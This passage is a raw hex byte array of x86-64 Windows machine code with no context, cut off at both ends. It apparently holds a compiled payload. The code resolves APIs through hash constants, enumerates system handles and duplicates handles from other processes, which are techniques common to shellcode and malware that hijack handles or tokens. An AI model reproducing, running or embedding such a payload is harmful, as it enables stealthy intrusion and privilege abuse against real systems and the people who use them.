B8,0x00,0x00,0x00,0x00,0x89,0xC1,0xE8,0x93,0x00,0x00,0x00,0x48,0x89,0x45,0xF8,0xEB,0x11,0x8B,0x55,0x40,0x8B,0x45,0x18,0x89,0xC1,0xE8,0x0E,0x00,0x00,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x44,0x8B,0x45,0x18,0x8B,0x55,0x10,0x48,0x8D,0x4D,0xF0,0x48,0x89,0x4C,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3F,0x2C,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x1A,0x00,0x00,0x80,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x21,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x14,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x12,0xEA,0xFF,0xFF,0x85,0xC0,0x74,0xAE,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8B,0x45,0x28,0x89,0x45,0xD8,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x4C,0x8D,0x45,0xB0,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0x18,0x48,0x8D,0x45,0xF0,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x24,0x2B,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x0B,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x21,0x81,0x7D,0xFC,0x22,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x11,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x20,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF8,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0xD5,0x0C,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC9,0x0C,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xD2,0x00,0x00,0x00,0x8B,0x55,0xE8,0x48,0x8D,0x4D,0xE8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xC9,0x41,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x10,0x00,0x00,0x00,0xE8,0xDF,0x2E,0x00,0x00,0x89,0x45,0xEC,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x75,0x7C,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF0,0x7A,0x00,0x00,0x48,0x8B,0x05,0x61,0x0C,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x59,0x0C,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF8,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0x2D,0x0C,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x21,0x0C,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xEB,0x2D,0x83,0x7D,0xEC,0x00,0x79,0x08,0xEB,0x25,0x90,0xE9,0x4C,0xFF,0xFF,0xFF,0x90,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x28,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x50,0x48,0x83,0x7D,0xF0,0x00,0x74,0x49,0x48,0x83,0x7D,0xF0,0x00,0x74,0x42,0x8B,0x45,0xE8,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0x7A,0x00,0x00,0x48,0x8B,0x05,0xA9,0x0B,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA1,0x0B,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x48,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x1B,0x48,0x8B,0x45,0x10,0x8B,0x55,0xFC,0x8B,0x44,0x90,0x04,0x39,0x45,0x18,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x14,0x83,0x45,0xFC,0x01,0x48,0x8B,0x45,0x10,0x8B,0x00,0x39,0x45,0xFC,0x72,0xDA,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x0E,0x0B,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x24,0x4E,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xFF,0x0A,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x9A,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xEB,0x72,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x8B,0x55,0x10,0x48,0x01,0xD0,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x0F,0xB7,0x00,0x0F,0xB7,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x2B,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x35,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x88,0x13,0x00,0x00,0x77,0x4B,0x48,0x8B,0x45,0xE8,0x44,0x0F,0xB7,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xF0,0x89,0x0A,0x41,0x0F,0xB7,0xC8,0x48,0x8B,0x55,0xF0,0x89,0xC0,0x89,0x4C,0x82,0x04,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0x10,0x8B,0x00,0x39,0x45,0xF8,0x72,0x83,0x48,0x8B,0x45,0x18,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xF0,0x00,0x74,0x47,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x24,0x4E,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA5,0x78,0x00,0x00,0x48,0x8B,0x05,0x16,0x0A,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x0E,0x0A,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xEC,0x00,0x10,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF8,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF8,0x8B,0x45,0xEC,0x89,0xC3,0x48,0x8B,0x05,0xAA,0x09,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9E,0x09,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA2,0x00,0x00,0x00,0x8B,0x4D,0xEC,0x48,0x8B,0x55,0xF0,0x48,0x8D,0x45,0xEC,0x48,0x89,0x44,0x24,0x20,0x41,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x03,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xE8,0x58,0x2C,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x78,0x1B,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xEC,0x48,0x8B,0x45,0x28,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA0,0x77,0x00,0x00,0x48,0x8B,0x05,0x11,0x09,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x09,0x09,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xFC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x26,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xDC,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xA3,0xFE,0xFF,0xFF,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x74,0x72,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xF0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xEB,0x50,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x08,0x48,0x8B,0x55,0x20,0x48,0x89,0xC1,0x48,0x8B,0x05,0xEA,0x08,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x15,0x8B,0x45,0xEC,0x8D,0x50,0x02,0x48,0x8B,0x45,0x28,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x2D,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x40,0x02,0x0F,0xB7,0xC0,0x48,0x83,0xC0,0x07,0x48,0x83,0xE0,0xF8,0x48,0x83,0xC0,0x68,0x48,0x01,0x45,0xF0,0x83,0x45,0xEC,0x01,0x48,0x8B,0x45,0xE0,0x8B,0x00,0x39,0x45,0xEC,0x72,0xA5,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xDC,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6F,0x76,0x00,0x00,0x48,0x8B,0x5D,0xE0,0x48,0x8B,0x05,0xDC,0x07,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD8,0x07,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xB8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xB0,0x00,0x00,0x00,0x89,0x4D,0x20,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x94,0x48,0x89,0xC2,0x48,0x8D,0x05,0x76,0x98,0x00,0x00,0x48,0x89,0xC1,0xE8,0x54,0xFE,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x25,0x02,0x00,0x00,0x48,0x8D,0x55,0xA4,0x48,0x8D,0x45,0xA8,0x48,0x89,0xC1,0xE8,0xF6,0xF9,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x0B,0x02,0x00,0x00,0x48,0x8B,0x45,0xA8,0x48,0x8D,0x55,0x98,0x48,0x89,0xC1,0xE8,0xBC,0xFB,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0xF1,0x01,0x00,0x00,0xC7,0x45,0xC4,0x40,0x00,0x00,0x00,0x8B,0x45,0xC4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0x89,0x45,0xD0,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0xAF,0x01,0x00,0x00,0x48,0x8B,0x45,0x98,0x8B,0x55,0xE4,0x8B,0x44,0x90,0x04,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x3B,0x45,0xD0,0x0F,0x84,0x87,0x01,0x00,0x00,0x8B,0x45,0xD4,0x3B,0x45,0x20,0x0F,0x84,0x7E,0x01,0x00,0x00,0x83,0x7D,0xD4,0x00,0x0F,0x84,0x77,0x01,0x00,0x00,0x83,0x7D,0xD4,0x04,0x0F,0x84,0x70,0x01,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x24,0x01,0x00,0x00,0x48,0x8B,0x4D,0xA8,0x8B,0x55,0xE0,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0xD4,0x0F,0x85,0xE4,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0x94,0x39,0xC2,0x0F,0x85,0xD1,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x0F,0x85,0xC1,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x75,0x2A,0x8B,0x45,0xD4,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x01,0x00,0x00,0x00,0xBA,0x40,0x00,0x00,0x00,0x89,0xC1,0xE8,0x1B,0xF8,0xFF,0xFF,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xA9,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xC0,0x49,0x89,0xC2,0x48,0x8D,0x4D,0xB0,0x48,0x8B,0x45,0xE8,0xC7,0x44,0x24,0x30,0x02,0x00,0x00,0x00,0x8B,0x55,0x30,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x4C,0x89,0xD2,0x48,0x89,0xC1,0xE8,0x3E,0x28,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x78,0x40,0x48,0x8B,0x45,0xB0,0x48,0x89,0xC1,0xE8,0xB1,0xE1,0xFF,0xFF,0x85,0xC0,0x74,0x11,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xB0,0x48,0x89,0x45,0xF0,0xEB,0x36,0x48,0x8B,0x45,0xB0,0x48,0x89,0xC1,0xE8,0x42,0x24,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xE0,0x01,0x48,0x8B,0x45,0xA8,0x8B,0x00,0x39,0x45,0xE0,0x0F,0x82,0xCD,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x48,0x83,0x7D,0xE8,0x00,0x74,0x20,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x05,0x24,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xE4,0x01,0x83,0x7D,0xFC,0x00,0x75,0x1A,0x48,0x8B,0x45,0x98,0x8B,0x00,0x39,0x45,0xE4,0x0F,0x82,0x3C,0xFE,0xFF,0xFF,0xEB,0x09,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xA8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xA8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xA4,0x89,0xC2,0x48,0x8B,0x45,0xA8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4B,0x73,0x00,0x00,0x48,0x8B,0x5D,0xA8,0x48,0x8B,0x05,0xB8,0x04,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB4,0x04,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x98,0x48,0x85,0xC0,0x74,0x49,0x48,0x8B,0x45,0x98,0x48,0x85,0xC0,0x74,0x40,0x48,0x8B,0x45,0x98,0x41,0xB8,0x24,0x4E,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF9,0x72,0x00,0x00,0x48,0x8B,0x5D,0x98,0x48,0x8B,0x05,0x66,0x04,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x62,0x04,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x0C,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x13,0x23,0x00,0x00,0x83,0x7D,0xFC,0x00,0x74,0x06,0x48,0x8B,0x45,0xF0,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x48,0x81,0xC4,0xB8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0x90,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBF,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8B,0x45,0x18,0x89,0x45,0xD8,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x4D,0x10,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x04,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x10,0x48,0x89,0xC1,0xE8,0x57,0x25,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x08,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x22,0x22,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x81,0xC4,0x90,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xFD,0x00,0x00,0x00,0x48,0x83,0x7D,0x18,0x00,0x0F,0x84,0xF2,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x41,0x94,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7E,0xE6,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDB,0xFD,0x4F,0xE5,0x48,0x89,0xC1,0xE8,0x8C,0xE4,0xFF,0xFF,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xBF,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x44,0x8B,0x45,0xF4,0x8B,0x4D,0xF8,0x48,0x8B,0x55,0x10,0x48,0x8B,0x45,0x18,0x4C,0x8B,0x55,0xE8,0x45,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x46,0x21,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x83,0x7D,0xF0,0x00,0x75,0x6D,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xB6,0x93,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF3,0xE5,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDE,0x92,0x8E,0x56,0x48,0x89,0xC1,0xE8,0x01,0xE4,0xFF,0xFF,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x74,0x3E,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x8D,0x55,0xD8,0x4C,0x8B,0x55,0xE0,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x15,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0x10,0x00,0x74,0x0C,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB1,0x20,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x1B,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x45,0x18,0x48,0x8B,0x00,0x48,0x89,0xC1,0xE8,0x90,0x20,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x15,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xD8,0x48,0x89,0xC1,0xE8,0x75,0x20,0x00,0x00,0x83,0x7D,0xFC,0x00,0x74,0x06,0x48,0x8B,0x45,0xD8,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x6F,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xB3,0x92,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF0,0xE4,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xD4,0x0B,0x8F,0x24,0x48,0x89,0xC1,0xE8,0xFE,0xE2,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x36,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF8,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x45,0xF4,0x48,0x8B,0x45,0x10,0x48,0x89,0